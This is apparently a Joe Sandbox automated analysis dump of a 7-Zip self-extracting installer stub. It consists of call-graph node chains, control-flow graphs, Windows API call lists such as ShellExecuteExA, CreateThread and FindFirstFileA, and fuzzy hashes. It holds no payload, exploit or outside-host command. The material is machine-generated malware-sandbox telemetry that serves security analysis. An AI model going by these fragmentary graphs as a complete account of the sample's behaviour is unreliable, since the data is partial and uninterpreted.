CreateDirectoryA 15454->15459 15456 4049bd 15457 403a9c ctype 29 API calls 15456->15457 15458 4049c7 15457->15458 15458->14621 15459->15456 15581 40c318 __EH_prolog 15580->15581 15587 40c290 15586->15587 15589 40c296 15586->15589 15587->14671 15589->15587 15591 4042ff 30 API calls 15590->15591 16137 409500 __EH_prolog 16136->16137 16138 401ce1 30 API calls 16137->16138 16139 409513 16138->16139 16140 401c80 30 API calls 16139->16140 16141 409524 16140->16141 16142 401e56 30 API calls 16141->16142 16143 409537 16142->16143 16144 403a9c ctype 29 API calls 16143->16144 16145 409543 16144->16145 16146 401ce1 30 API calls 16145->16146 16151 403426 __EH_prolog 16150->16151 16152 4042d6 ctype 34 API calls 16151->16152 16153 403452 16152->16153 16154 4042ad ctype 34 API calls 16153->16154 16155 40345d 16154->16155 16156 4042d6 ctype 34 API calls 16155->16156 16157 403471 16156->16157 16158 4042ad ctype 34 API calls 16157->16158 16159 40347c 16158->16159 16159->14505 16161 4035b0 __EH_prolog 16160->16161 16162 402170 30 API calls 16161->16162 16163 4035dd 16162->16163 16170 403664 16163->16170 16167 403614 16168 403570 16167->16168 16177 413d3d RaiseException 16167->16177 16168->14521 16178 413310 InitializeCriticalSection 16170->16178 16172 4035f1 16173 4132a0 CreateEventA 16172->16173 16174 4132c1 GetLastError 16173->16174 16175 4132be 16173->16175 16176 4132cb 16174->16176 16175->16167 16176->16167 16177->16168 16178->16172 16180 416efc 30 API calls 16179->16180 16181 4148ce 16180->16181 16182 414911 16181->16182 16185 4148dc CreateThread 16181->16185 16183 413f9f ctype 29 API calls 16182->16183 16184 414917 16183->16184 16186 413239 16184->16186 16189 416e77 16184->16189 16185->16186 16187 414909 GetLastError 16185->16187 16209 414929 TlsGetValue 16185->16209 16186->14526 16186->14527 16187->16182 16206 416ef3 16189->16206 16192 416eb0 16194 416eea 35 API calls 16192->16194 16193 416e99 16195 416ec0 16193->16195 16197 416ea3 16193->16197 16196 416eb5 16194->16196 16198 416edd 16195->16198 16199 416ed0 16195->16199 16196->16186 16201 416eea 35 API calls 16197->16201 16200 416eea 35 API calls 16198->16200 16202 416eea 35 API calls 16199->16202 16203 416ee2 16200->16203 16204 416ea8 16201->16204 16205 416ed5 16202->16205 16203->16186 16204->16186 16205->16186 16207 415523 35 API calls 16206->16207 16208 416e7d 16207->16208 16208->16192 16208->16193 16210 414961 16209->16210 16211 414976 TlsSetValue 16209->16211 16221 41558a 16210->16221 16214 414995 GetCurrentThreadId 16211->16214 16215 41498d 16211->16215 16216 4149a6 16214->16216 16217 414c0c ctype 7 API calls 16215->16217 16243 4149ef 16216->16243 16218 414994 16217->16218 16218->16214 16222 415629 16221->16222 16223 415598 16221->16223 16222->16211 16224 4155a1 TlsGetValue 16223->16224 16225 4155ae 16223->16225 16224->16225 16226 41561a TlsSetValue 16224->16226 16227 4155bb 16225->16227 16228 413f9f ctype 29 API calls 16225->16228 16226->16222 16229 4155c9 16227->16229 16230 413f9f ctype 29 API calls 16227->16230 16228->16227 16231 4155d7 16229->16231 16232 413f9f ctype 29 API calls 16229->16232 16230->16229 16233 4155e5 16231->16233 16235 413f9f ctype 29 API calls 16231->16235 16232->16231 16234 4155f3 16233->16234 16236 413f9f ctype 29 API calls 16233->16236 16237 415601 16234->16237 16238 413f9f ctype 29 API calls 16234->16238 16235->16233 16236->16234 16239 415612 16237->16239 16240 413f9f ctype 29 API calls 16237->16240 16238->16237 16241 413f9f ctype 29 API calls 16239->16241 16240->16239 16242 415619 16241->16242 16242->16226 16244 4149f8 16243->16244 16245 415523 35 API calls 16244->16245 16246 414a00 16245->16246 16247 414a0d 16246->16247 16248 414c0c ctype 7 API calls 16246->16248 16249 41558a 31 API calls 16247->16249 16248->16247 16250 414a14 ExitThread 16249->16250 16252 406215 __EH_prolog 16251->16252 16253 406240 16252->16253 16254 406226 DialogBoxParamW 16252->16254 16255 40243e 30 API calls 16253->16255 16261 4030ca 16254->16261 16256 406253 16255->16256 16257 40629a DialogBoxParamA 16256->16257 16258 401c80 30 API calls 16256->16258 16259 403a9c ctype 29 API calls 16257->16259 16260 406269 16258->16260 16259->16261 16262 401a18 31 API calls 16260->16262 16270 413210 WaitForSingleObject 16261->16270 16263 406278 16262->16263 16264 4052f9 30 API calls 16263->16264 16265 406285 16264->16265 16266 403a9c ctype 29 API calls 16265->16266 16267 40628d 16266->16267 16268 403a9c ctype 29 API calls 16267->16268 16269 406295 16268->16269 16269->16257 16270->14540 16272 406053 __EH_prolog 16271->16272 16273 406074 16272->16273 16274 406065 SetWindowTextW 16272->16274 16275 401c80 30 API calls 16273->16275 16282 4030ed 16274->16282 16276 40607c 16275->16276 16277 403d04 31 API calls 16276->16277 16278 40608b SetWindowTextA 16277->16278 16279 403a9c ctype 29 API calls 16278->16279 16280 4060a1 16279->16280 16281 403a9c ctype 29 API calls 16280->16281 16281->16282 16282->14545 16284 4023a8 16283->16284 16286 4023c1 16284->16286 16287 402559 16284->16287 16286->13999 16288 402569 16287->16288 16289 4021c4 30 API calls 16288->16289 16290 402577 ctype 16289->16290 16290->16286 16292 403f46 __EH_prolog 16291->16292 16293 40243e 30 API calls 16292->16293 16294 403f69 16293->16294 16295 403f9a 16294->16295 16297 401ee5 30 API calls 16294->16297 16296 403d24 30 API calls 16295->16296 16298 403fa6 16296->16298 16297->16294 16299 403a9c ctype 29 API calls 16298->16299 16300 403fae 16299->16300 16300->14047 16302 4040c8 __EH_prolog 16301->16302 16303 403a76 30 API calls 16302->16303 16304 4040d4 16303->16304 16305 4040fe 16304->16305 16306 401ce1 30 API calls 16304->16306 16307 4039df 30 API calls 16305->16307 16308 4040ee 16306->16308 16309 40410f 16307->16309 16310 401ce1 30 API calls 16308->16310 16309->14047 16310->16305 16312 403a9c ctype 29 API calls 16311->16312 16313 40214a 16312->16313 16314 403a9c ctype 29 API calls 16313->16314 16315 402151 16314->16315 16315->14047 16317 405f68 __EH_prolog 16316->16317 16318 405ff8 16317->16318 16319 405f7f 16317->16319 16332 405ebc 16318->16332 16321 402170 30 API calls 16319->16321 16323 405f93 16321->16323 16326 405fb2 LoadStringW 16323->16326 16327 402170 30 API calls 16323->16327 16324 401a03 31 API calls 16325 405ff3 16324->16325 16329 403a9c ctype 29 API calls 16325->16329 16326->16323 16328 405fcb 16326->16328 16327->16326 16330 401ce1 30 API calls 16328->16330 16331 4015a2 16329->16331 16330->16325 16331->13514 16333 405ec6 __EH_prolog 16332->16333 16334 40243e 30 API calls 16333->16334 16335 405ee9 16334->16335 16336 405f08 LoadStringA 16335->16336 16337 40243e 30 API calls 16335->16337 16336->16335 16338 405f21 16336->16338 16337->16336 16338->16338 16339 403d24 30 API calls 16338->16339 16340 405f42 16339->16340 16341 403a9c ctype 29 API calls 16340->16341 16342 405f4a 16341->16342 16342->16324 16379 404c54 __EH_prolog 16378->16379 16380 404d51 30 API calls 16379->16380 16381 404c64 16380->16381 16414 405468 16381->16414 16384 405468 30 API calls 16385 404c86 16384->16385 16386 403d24 30 API calls 16385->16386 16387 404c97 16386->16387 16388 403a9c ctype 29 API calls 16387->16388 16394 404ca3 16388->16394 16390 404cfe 16391 403a9c ctype 29 API calls 16390->16391 16393 404d0a 16391->16393 16392 403d24 30 API calls 16392->16394 16395 40551a FindClose 16393->16395 16394->16390 16394->16392 16399 404cd3 16394->16399 16424 405949 16394->16424 16428 404d6c 16394->16428 16397 404d13 16395->16397 16443 40489c SetFileAttributesA 16397->16443 16401 403a9c ctype 29 API calls 16399->16401 16400 404d1c 16402 404d27 16400->16402 16444 4048aa RemoveDirectoryA 16400->16444 16403 404cdf 16401->16403 16406 403a9c ctype 29 API calls 16402->16406 16405 40551a FindClose 16403->16405 16408 404ce8 16405->16408 16407 404d31 16406->16407 16409 403a9c ctype 29 API calls 16408->16409 16411 404cf0 16409->16411 16413 403a9c ctype 29 API calls 16411->16413 16412 401a41 16412->13536 16413->16412 16415 405472 __EH_prolog 16414->16415 16416 403d24 30 API calls 16415->16416 16417 405485 16416->16417 16418 401ee5 30 API calls 16417->16418 16419 405494 16418->16419 16420 403d24 30 API calls 16419->16420 16421 40549f 16420->16421 16422 403a9c ctype 29 API calls 16421->16422 16423 404c75 16422->16423 16423->16384 16426 405951 16424->16426 16427 40596a 16426->16427 16445 405929 16426->16445 16427->16394 16429 404d76 __EH_prolog 16428->16429 16430 404d88 16429->16430 16431 404da9 16429->16431 16455 405417 16430->16455 16433 405417 30 API calls 16431->16433 16435 404db8 16433->16435 16437 404bdc 2 API calls 16435->16437 16438 404da2 16437->16438 16439 403a9c ctype 29 API calls 16438->16439 16440 404dc9 16439->16440 16443->16400 16444->16402 16446 405939 16445->16446 16447 40592e 16445->16447 16449 40553a 32 API calls 16446->16449 16451 4057cf FindNextFileA 16447->16451 16450 405937 16449->16450 16450->16426 16452 4057f1 16451->16452 16453 4057ff 16451->16453 16454 40557f 30 API calls 16452->16454 16453->16450 16454->16453 16456 405421 __EH_prolog 16455->16456 16457 403d24 30 API calls 16456->16457 16458 405434 16457->16458 16465 4054b9 16458->16465 16466 40248c 30 API calls 16465->16466 16467 405443 16466->16467 16477 416d5d 16468->16477 16471 416cc9 GetCurrentProcess TerminateProcess 16472 416cda 16471->16472 16473 416d44 16472->16473 16474 416d4b ExitProcess 16472->16474 16480 416d66 16473->16480 16478 41570a ctype 29 API calls 16477->16478 16479 416cbe 16478->16479 16479->16471 16479->16472 16483 41576b LeaveCriticalSection 16480->16483 16482 414bed 16482->13692 16483->16482 16484 40b8bb 16485 40b8c8 16484->16485 16486 40b8d9 16484->16486 16485->16486 16490 40b8fa 16485->16490 16489 403a9c ctype 29 API calls 16489->16486 16491 40b904 __EH_prolog 16490->16491 16492 4042d6 ctype 34 API calls 16491->16492 16493 40b928 16492->16493 16494 4042ad ctype 34 API calls 16493->16494 16495 40b933 16494->16495 16496 4042d6 ctype 34 API calls 16495->16496 16497 40b94a 16496->16497 16498 4042ad ctype 34 API calls 16497->16498 16499 40b955 16498->16499 16500 4099bc 34 API calls 16499->16500 16501 40b8d3 16500->16501 16501->16489

                                                        Control-flow Graph

                                                        APIs
                                                        • GetVersion.KERNEL32 ref: 00414B2A
                                                          • Part of subcall function 004159F8: HeapCreate.KERNELBASE(00000000,00001000,00000000,00414B62,00000001), ref: 00415A09
                                                          • Part of subcall function 004159F8: HeapDestroy.KERNEL32 ref: 00415A48
                                                        • GetCommandLineA.KERNEL32 ref: 00414B8A
                                                        • GetStartupInfoA.KERNEL32(?), ref: 00414BB5
                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00414BD8
                                                          • Part of subcall function 00414C31: ExitProcess.KERNEL32 ref: 00414C4E
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                        • String ID:
                                                        • API String ID: 2057626494-0
                                                        • Opcode ID: e3a55e15dfbba78f576db0669a4780403b126b59620817d16bca0fbeb85d5517
                                                        • Instruction ID: b13fe99396feb2249fb7197ea22bdd2eb3a8d4431b5d50e9622b99800ed9eeb5
                                                        • Opcode Fuzzy Hash: e3a55e15dfbba78f576db0669a4780403b126b59620817d16bca0fbeb85d5517
                                                        • Instruction Fuzzy Hash: 0721D2B0A44705AFD718AFB6DC46BEE7BB8EF44714F10052FF9009A291DB3C85808A9C

                                                        Control-flow Graph

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 004055E3
                                                          • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00405611
                                                        • AreFileApisANSI.KERNEL32(?), ref: 0040563D
                                                        • FindFirstFileA.KERNEL32(?,?,00000001), ref: 0040565E
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: FileFind$First$ApisCloseH_prolog
                                                        • String ID:
                                                        • API String ID: 4121580741-0
                                                        • Opcode ID: fcb5256250039c908afd196fb8e76c17c38080862ebf91937f58451f3d562862
                                                        • Instruction ID: 53571c6d670a3437f98eaf3b47711b77fa147e423a783867877babb07b55427d
                                                        • Opcode Fuzzy Hash: fcb5256250039c908afd196fb8e76c17c38080862ebf91937f58451f3d562862
                                                        • Instruction Fuzzy Hash: AB21813180050ADFCF11EF60C8459EEBB75EF00329F10476AE4A5B61E1DB399A85CF48
                                                        APIs
                                                          • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                                                        • FindFirstFileA.KERNELBASE(?,?,000000FF), ref: 00405559
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 4d5417fc6ca074e65557f02866c61fee52306747aaa4eef42dce5467d8724910
                                                        • Instruction ID: 4d0f5172a85985fc9641596f45f8b0e99eb03685ed3a07152804d04183bf4296
                                                        • Opcode Fuzzy Hash: 4d5417fc6ca074e65557f02866c61fee52306747aaa4eef42dce5467d8724910
                                                        • Instruction Fuzzy Hash: 5DE0923040050876CB20BF35DC019EB776AEF11398F104276F955672E5D738D9468F98

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 401014-401124 call 401a51 call 402170 * 4 GetCommandLineW call 401c80 call 4038ee call 403a9c call 402170 call 4045e2 call 40235e call 402323 call 401c80 call 401e3a call 403b4f call 403a9c * 2 35 401126-401155 call 401e19 call 401d7a call 403a9c call 40235e call 402323 0->35 36 40115a-401184 call 40243e call 401af4 0->36 35->36 45 401186-401189 36->45 46 40119f-4011cb call 401c80 call 402170 36->46 48 401197-40119a 45->48 49 40118b-401192 call 411093 45->49 62 4014b1-4014d5 call 401ecd call 405298 46->62 63 4011d1-4011f7 call 402155 call 403d5a 46->63 53 4019c4-4019f7 call 403a9c * 6 48->53 49->48 109 4019fa 53->109 78 4014f0-4014fc call 403a76 62->78 79 4014d7-4014da 62->79 80 401212-4012a1 call 401c80 call 404073 call 403a9c call 401c80 call 404073 call 403a9c call 401c80 call 404073 call 403a9c call 403b4f 63->80 81 4011f9-4011fc 63->81 99 401513 78->99 100 4014fe-401511 call 401f0d 78->100 85 4014e8-4014eb 79->85 86 4014dc-4014e3 call 411093 79->86 189 4012a3 80->189 190 4012a9-4012d1 call 401c80 call 404041 call 403a9c 80->190 82 40120a-40120d 81->82 83 4011fe-401205 call 411093 81->83 91 401333-401398 call 4042d6 call 4042ad call 403a9c * 8 82->91 83->82 94 401998-4019c1 call 401a2d call 403a9c * 3 85->94 86->85 91->109 94->53 106 401515-401517 99->106 100->106 112 401519-40151b 106->112 113 40151f-401528 call 408107 106->113 118 4019fc-401a00 109->118 112->113 125 40152a-401536 call 411093 113->125 126 40153b-401583 call 401a03 call 402170 call 402f15 113->126 140 40163e-401640 125->140 156 401585-401588 126->156 157 4015f9-401622 call 403a9c call 401ecd call 405033 SetCurrentDirectoryA 126->157 140->85 145 401646-40164c 140->145 145->85 161 4015f1-4015f4 156->161 162 40158a-40158d 156->162 196 401651-401654 157->196 197 401624-40163d SetCurrentDirectoryA call 403a9c * 2 157->197 166 4018b7-4018cb call 403a9c * 2 161->166 167 401594-4015b7 call 40602f call 401d7a call 403a9c 162->167 168 40158f-401592 162->168 200 4018d3-401935 call 401a2d call 403a9c * 9 166->200 201 4018cd-4018cf 166->201 169 4015bc-4015c1 167->169 168->167 168->169 169->161 178 4015c3-4015c6 169->178 178->161 184 4015c8-4015f0 call 40602f MessageBoxW call 403a9c 178->184 184->161 189->190 235 4012d3-4012e6 call 401d7a 190->235 236 4012eb-4012ee 190->236 202 40165a-401691 call 401a18 196->202 203 40172c-40172f 196->203 197->140 200->118 201->200 222 401693-40169a call 401de3 202->222 223 40169f-4016e4 call 401a18 ShellExecuteExA 202->223 211 401731-40176b call 401d1b call 401a18 call 40587c call 403a9c 203->211 212 401787-4017f9 call 401ce1 call 405d0b call 401c80 call 401e56 call 403a9c * 2 call 401c80 call 401e56 call 403a9c 203->212 211->212 278 40176d-401770 211->278 324 401811-401891 call 402634 call 401a18 call 403a9c GetFileAttributesW 212->324 325 4017fb-40180c call 401db8 call 401de3 212->325 222->223 245 4016e6-4016e9 223->245 246 40170d-401727 call 403a9c * 2 223->246 235->236 242 4012f4-4012f7 236->242 243 40139d-4014ac call 401c80 call 404073 call 401d7a call 403a9c * 2 call 401c80 call 404073 call 401d7a call 403a9c * 2 call 401c80 call 404073 call 402634 call 401d7a call 403a9c * 6 call 4042d6 call 4042ad 236->243 242->243 251 4012fd-40130f MessageBoxW 242->251 243->62 253 4016f7-401708 call 403a9c * 2 245->253 254 4016eb-4016f2 call 411093 245->254 281 40195a-40195e 246->281 251->243 259 401315-401330 call 403a9c * 3 251->259 287 4018ae 253->287 254->253 259->91 279 401776-401782 call 411093 278->279 280 4018af-4018b4 SetCurrentDirectoryA 278->280 279->280 280->166 289 401960-40196e WaitForSingleObject CloseHandle 281->289 290 401974-401990 SetCurrentDirectoryA call 403a9c * 2 281->290 287->280 289->290 290->94 317 401992-401994 290->317 317->94 342 401897-40189a 324->342 343 40193a-401955 CloseHandle call 403a9c 324->343 325->324 345 4018a3-4018a9 call 403a9c 342->345 346 40189c-40189e call 411127 342->346 343->281 345->287 346->345
                                                        APIs
                                                          • Part of subcall function 00401A51: GetVersionExA.KERNEL32(?), ref: 00401A6B
                                                        • GetCommandLineW.KERNEL32(00000003,00000003,00000003,00000003,?,00000000), ref: 0040108B
                                                          • Part of subcall function 004038EE: __EH_prolog.LIBCMT ref: 004038F3
                                                          • Part of subcall function 004045E2: __EH_prolog.LIBCMT ref: 004045E7
                                                          • Part of subcall function 004045E2: GetModuleFileNameW.KERNEL32(?,?,00000105,00000003,00000000,00000000), ref: 00404618
                                                          • Part of subcall function 0040235E: __EH_prolog.LIBCMT ref: 00402363
                                                          • Part of subcall function 00402323: __EH_prolog.LIBCMT ref: 00402328
                                                          • Part of subcall function 00403D5A: __EH_prolog.LIBCMT ref: 00403D5F
                                                        • MessageBoxW.USER32(00000000,?,?,00000010), ref: 004015DF
                                                        • SetCurrentDirectoryA.KERNELBASE(?,?,00000001,?,?,00000003,00000003,0042023C,;!@InstallEnd@!,?,00000003,00000000,00000002,00420274,00000003,?), ref: 0040161E
                                                        • SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 00401627
                                                        • ShellExecuteExA.SHELL32(0000003C,?,00000000), ref: 004016D7
                                                        • MessageBoxW.USER32(00000000,?,?,00000024), ref: 00401306
                                                          • Part of subcall function 00411093: MessageBoxW.USER32(00000000,?,7-Zip,00000010), ref: 0041109C
                                                          • Part of subcall function 00402F15: __EH_prolog.LIBCMT ref: 00402F1A
                                                        • SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 004018B2
                                                        • CloseHandle.KERNEL32(?,?,00000000), ref: 00401940
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00401965
                                                        • CloseHandle.KERNEL32(?,?,00000000), ref: 0040196E
                                                        • SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 00401977
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog$CurrentDirectory$Message$CloseHandle$CommandExecuteFileLineModuleNameObjectShellSingleVersionWait
                                                        • String ID: $%%T$%%T\$;!@Install@!UTF-8!$;!@InstallEnd@!$<$> @$Can not create temp folder archive$Can not find setup.exe$Can not load codecs$Can not open file$Can't load config info$Config failed$D$Directory$ExecuteFile$ExecuteParameters$RunProgram$Title$setup.exe
                                                        • API String ID: 2760820266-829806607
                                                        • Opcode ID: 712b446a7bada0dd4c96bd94ae0ede08f078cacdd1ac77361cc7282078058cc0
                                                        • Instruction ID: 30a6e78c0a87ce65c61bf6c489231b06ab30573cf11c386798d37ebdc1e5dfdc
                                                        • Opcode Fuzzy Hash: 712b446a7bada0dd4c96bd94ae0ede08f078cacdd1ac77361cc7282078058cc0
                                                        • Instruction Fuzzy Hash: 57524971D002199ADF21EFA1DC85AEEBB75BF04318F1040BFE149761A2DB395A85CF58

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 372 40ad19-40ad3d call 413954 call 40d7cc 377 40ad43-40ad79 call 402155 call 413310 call 40640d 372->377 378 40b2d7-40b2dc 372->378 386 40ae60-40ae97 call 40acc4 call 40b99b call 40b63c 377->386 387 40ad7f 377->387 379 40b605-40b613 378->379 402 40aeb6-40aec6 call 4042d6 386->402 403 40ae99-40aeb0 call 40b753 386->403 389 40ad82-40ad8c call 403a76 387->389 395 40ad9c 389->395 396 40ad8e-40ad9a 389->396 398 40ad9e-40ada3 395->398 396->398 400 40ada5-40ada7 398->400 401 40adab-40add6 call 403a76 398->401 400->401 410 40add8-40ade8 401->410 411 40adea 401->411 414 40aed1-40aed5 402->414 415 40aec8-40aece 402->415 403->402 413 40b071-40b087 403->413 412 40adec-40adf1 410->412 411->412 418 40adf3-40adf5 412->418 419 40adf9-40ae32 call 40640d call 40a5e4 412->419 426 40b08d-40b090 413->426 427 40b4bf-40b4e1 call 40a402 413->427 416 40aed7-40aeeb call 403a76 414->416 417 40af18-40af2a 414->417 415->414 431 40aef6 416->431 432 40aeed-40aef4 call 40b860 416->432 429 40af73-40af79 417->429 430 40af2c-40af6e call 4042ad call 4099bc DeleteCriticalSection call 403800 417->430 418->419 449 40ae34-40ae36 419->449 450 40ae3a-40ae40 419->450 435 40b093-40b0c8 426->435 445 40b4e3-40b4e9 427->445 446 40b4ec-40b4ef 427->446 441 40b05f-40b06e call 40b96f 429->441 442 40af7f-40afac call 4063bd 429->442 506 40b535-40b549 call 4042d6 call 4042ad 430->506 439 40aef8-40af0c call 40640d 431->439 432->439 453 40b0f3-40b0f9 435->453 454 40b0ca-40b0d3 435->454 470 40af13 439->470 471 40af0e-40af11 439->471 441->413 472 40afb2-40afbd 442->472 473 40b197-40b1a0 442->473 445->446 456 40b4f1-40b533 call 4042ad call 4099bc DeleteCriticalSection call 403800 446->456 457 40b54e-40b57e call 4032a8 call 404327 446->457 449->450 461 40ae42-40ae44 450->461 462 40ae48-40ae57 450->462 467 40b101-40b149 call 4032a8 * 2 call 404327 * 2 453->467 468 40b0fb-40b0fd 453->468 463 40b382-40b388 454->463 464 40b0d9-40b0ea 454->464 456->506 520 40b580-40b597 call 4039df 457->520 521 40b599-40b5b9 call 409cc8 457->521 461->462 462->389 474 40ae5d 462->474 480 40b390-40b3d7 call 4042ad call 4099bc DeleteCriticalSection call 403800 463->480 481 40b38a-40b38c 463->481 499 40b0f0 464->499 500 40b3d9-40b3e2 464->500 576 40b163-40b169 467->576 577 40b14b-40b161 call 4039df 467->577 468->467 477 40af15 470->477 471->477 482 40afeb-40afef 472->482 483 40afbf-40afc3 472->483 484 40b1a2-40b1a4 473->484 485 40b1a8-40b1b1 473->485 474->386 477->417 562 40b42c-40b442 call 4042d6 call 4042ad 480->562 481->480 487 40b270-40b279 482->487 488 40aff5-40b004 call 40640d 482->488 483->482 493 40afc5-40afca 483->493 484->485 495 40b1b3-40b1b5 485->495 496 40b1b9-40b1fd call 4042ad call 4099bc DeleteCriticalSection call 403800 485->496 504 40b281-40b2d2 call 4042ad call 4099bc DeleteCriticalSection call 403800 call 4042d6 call 4042ad 487->504 505 40b27b-40b27d 487->505 527 40b011-40b026 call 40bab0 488->527 528 40b006-40b00c call 40a0de 488->528 508 40afd0-40afdc call 40640d 493->508 509 40b202-40b20b 493->509 495->496 496->506 499->453 512 40b3e4-40b3e6 500->512 513 40b3ea-40b425 call 4042ad call 4099bc DeleteCriticalSection call 403800 500->513 504->378 505->504 569 40b603 506->569 508->527 537 40afde-40afe9 call 40a0b9 508->537 515 40b216-40b21c 509->515 516 40b20d-40b213 509->516 512->513 513->562 530 40b224-40b26b call 4042ad call 4099bc DeleteCriticalSection call 403800 515->530 531 40b21e-40b220 515->531 516->515 520->521 549 40b5bc-40b5fe call 4042ad * 2 call 4099bc call 40b845 call 40a5ac 521->549 565 40b028-40b02a 527->565 566 40b02e-40b037 527->566 528->527 530->506 531->530 537->527 549->569 562->379 565->566 574 40b039-40b03b 566->574 575 40b03f-40b048 566->575 569->379 574->575 585 40b050-40b059 575->585 586 40b04a-40b04c 575->586 588 40b33a-40b36e call 4042ad * 2 576->588 589 40b16f 576->589 577->576 585->441 585->442 586->585 588->435 627 40b374-40b379 588->627 595 40b172-40b179 589->595 600 40b2e5 595->600 601 40b17f 595->601 603 40b2e8-40b2ea 600->603 605 40b182-40b184 601->605 607 40b2f8-40b2ff 603->607 608 40b2ec-40b2f6 603->608 610 40b2e1-40b2e3 605->610 611 40b18a-40b190 605->611 614 40b310 607->614 615 40b301 607->615 613 40b31e-40b334 call 4039df 608->613 610->603 611->605 617 40b192 611->617 613->588 613->595 619 40b313-40b315 614->619 618 40b304-40b306 615->618 617->600 622 40b308-40b30e 618->622 623 40b37e-40b380 618->623 624 40b447-40b4ba call 4042ad * 3 call 4099bc DeleteCriticalSection call 403800 call 4042d6 call 4042ad 619->624 625 40b31b 619->625 622->614 622->618 623->619 624->379 625->613 627->427
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 0040AD1E
                                                          • Part of subcall function 0040D7CC: __EH_prolog.LIBCMT ref: 0040D7D1
                                                          • Part of subcall function 00413310: InitializeCriticalSection.KERNEL32(?,?,?,00000000,00000000), ref: 0041333E
                                                        • DeleteCriticalSection.KERNEL32(?), ref: 0040AF52
                                                        • DeleteCriticalSection.KERNEL32(?), ref: 0040B1DF
                                                        • DeleteCriticalSection.KERNEL32(?), ref: 0040B24A
                                                        • DeleteCriticalSection.KERNEL32(?), ref: 0040B2A7
                                                        • DeleteCriticalSection.KERNEL32(?), ref: 0040B3B6
                                                        • DeleteCriticalSection.KERNEL32(?), ref: 0040B410
                                                        • DeleteCriticalSection.KERNEL32(?,?,?,00000004,00000004), ref: 0040B485
